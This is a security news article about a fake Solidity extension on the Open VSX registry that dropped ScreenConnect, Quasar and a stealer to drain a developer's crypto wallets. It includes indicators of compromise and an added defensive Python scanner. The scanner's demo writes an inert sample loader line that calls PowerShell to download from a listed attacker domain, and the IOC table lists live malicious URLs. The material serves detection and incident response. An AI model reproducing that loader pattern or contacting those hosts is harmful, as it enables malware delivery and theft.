A sophisticated cyberattack has resulted in the theft of approximately $500,000 in cryptocurrency from a Russian blockchain developer, highlighting the persistent and evolving threat posed by malicious open-source packages.
Despite increased awareness and vigilance among the developer community, attackers continue to exploit public repositories and ranking algorithms to trick even experienced users into installing malicious software.
Fraudulent Extension Exploits
The incident came to light in June 2025, when the victim, an experienced developer who had recently reinstalled his operating system and used only essential, well-known applications, noticed his crypto assets had been drained despite rigorous attention to cybersecurity.
Investigators traced the breach to a Visual Studio Code-compatible extension called “Solidity Language” for the Cursor AI IDE, a productivity-boosting tool for smart contract developers.
The extension, distributed via the Open VSX registry, masqueraded as a legitimate code highlighting tool but was, in reality, a vehicle for remote code execution.
Upon installation, the rogue extension executed a JavaScript file, extension.js, which connected to a malicious web server to download and run PowerShell scripts.

These scripts, in turn, installed the legitimate remote management tool ScreenConnect, granting the attackers persistent remote access to the compromised system.
The attackers leveraged this access to deploy additional VBScripts, which fetched further payloads, including the Quasar open-source backdoor and a stealer module capable of siphoning credentials and wallet passphrases from browsers, email clients, and crypto wallets.
Blockchain Developers Targeted
The ruse was convincing: the malicious extension appeared near the top of search results within the extension marketplace, thanks to a ranking algorithm that weighted recency and apparent activity over simple download counts.
The attackers also copied descriptions from legitimate packages to further blur the line between authentic and malicious offerings.
When the fake extension failed to provide its promised functionality, the victim initially assumed it was a bug, allowing the malware to persist undetected.
In a further twist, after the malicious package was removed from the store, the threat actors quickly published a new clone named “solidity,” using sophisticated impersonation tactics.
The malicious publisher’s name differed by only a single character, an uppercase “I” in place of a lowercase “l”, a distinction almost impossible to spot because the two glyphs render nearly identically in many UI fonts.
Download counts for the fake extension were artificially inflated to two million in an attempt to outshine the legitimate tool, making the correct choice difficult for users.
The campaign did not end there; similar attack methodologies were identified in additional malicious packages on both the Open VSX registry and npm, targeting blockchain developers through recognizably named extensions and packages.
Each infection chain followed a familiar pattern: executing PowerShell scripts, downloading additional malware, and establishing communication with attacker-controlled command-and-control servers.
This incident underscores the enduring risks of supply-chain attacks in the open-source ecosystem.
Security experts recommend that developers use commercial-grade endpoint protection, rigorously verify extension authorship, scrutinize unexpected behaviors, and inspect downloaded source code for anomalies.
The case serves as a stark reminder that even seasoned developers can fall victim to well-concealed threats in public repositories.
Indicators of Compromise (IOC)
| Type | Indicator |
|---|---|
| JS Hash | 2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb |
| JS Hash | 404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a |
| JS Hash | 70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17 |
| JS Hash | 84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f |
| JS Hash | eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8 |
| JS Hash | f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c |
| URL | https://angelic[.]su/files/1.txt |
| URL | https://angelic[.]su/files/2.txt |
| URL | https://staketree[.]net/1.txt |
| URL | https://staketree[.]net/2.txt |
| URL | https://relay.lmfao[.]su |
| URL | https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest |
| IP Address | 144.172.112[.]84 |
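The hashes and domains above are only useful if someone actually sweeps with them. The script below is an added example, written for this article and not published by the investigators: it walks local VS Code and Cursor extension directories, hashes every JavaScript file against the six SHA-256 values, greps for the listed domains and IP (with the defanging brackets removed), and additionally flags the behaviour the infection chain describes, extension code that invokes PowerShell and references a remote URL. The extension paths under the home directory are assumptions for a typical install; the `demo()` function builds a constructed sample in a temporary directory so the logic can be exercised offline, and the "rogue" sample is inert text that is never executed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# SHA-256 of the malicious extension.js files, from the IOC table above.
JS_HASHES = {
    "2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb",
    "404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a",
    "70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17",
    "84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f",
    "eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8",
    "f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c",
}
# Network indicators from the same table, defanging brackets removed so they
# match what would literally appear in a script, bundle or log.
NETWORK_IOCS = ("angelic.su", "staketree.net", "lmfao.su", "144.172.112.84")

# Behavioural triage heuristic for the chain described in the article
# (extension.js -> PowerShell -> remote download). Not an article IOC, and
# benign extensions can match it; treat hits as something to read, not proof.
POWERSHELL_RE = re.compile(r"powershell(?:\.exe)?", re.IGNORECASE)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+", re.IGNORECASE)


def default_extension_roots() -> list[Path]:
    """Assumed default extension directories for VS Code and Cursor."""
    home = Path.home()
    return [home / ".vscode" / "extensions", home / ".cursor" / "extensions"]


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_extension_root(root: Path) -> list[dict]:
    """One finding per .js file that matches a known hash, a network IOC, or
    the PowerShell-plus-URL heuristic. node_modules is skipped for speed;
    drop that filter for a thorough sweep."""
    findings = []
    if not root.is_dir():
        return findings
    for js in sorted(root.rglob("*.js")):
        if "node_modules" in js.parts:
            continue
        hits = []
        digest = sha256_file(js)
        if digest in JS_HASHES:
            hits.append("known-malicious-hash")
        text = js.read_text(encoding="utf-8", errors="ignore")
        hits += [f"ioc:{ioc}" for ioc in NETWORK_IOCS if ioc in text]
        if POWERSHELL_RE.search(text) and URL_RE.search(text):
            hits.append("heuristic:powershell-with-remote-url")
        if hits:
            findings.append({"path": str(js), "sha256": digest, "hits": hits})
    return findings


def demo() -> list[dict]:
    """Constructed sample: one benign extension and one mimicking the loader
    the article describes. The strings are inert text; nothing runs or downloads."""
    root = Path(tempfile.mkdtemp(prefix="ext-sweep-"))
    benign = root / "good.publisher-1.0.0"
    benign.mkdir()
    (benign / "extension.js").write_text(
        "exports.activate = function () { console.log('highlighting ready'); };\n"
    )
    rogue = root / "fake.solidity-0.0.1"
    rogue.mkdir()
    (rogue / "extension.js").write_text(
        "const { exec } = require('child_process');\n"
        "exec('powershell -Command \"Invoke-WebRequest https://angelic.su/files/1.txt\"');\n"
    )
    return scan_extension_root(root)


if __name__ == "__main__":
    for root in default_extension_roots():
        for finding in scan_extension_root(root):
            print(finding["path"], finding["hits"])
    print(demo())
```

A clean hash sweep does not clear a machine on its own: the article notes the attackers republished under a new name after takedown, so new builds will carry new hashes. The domain and behavioural checks are what give the sweep some reach past the exact samples listed, and a positive on any of them warrants pulling the extension, checking for an unexpected ScreenConnect client, and rotating every credential and wallet passphrase stored on that host.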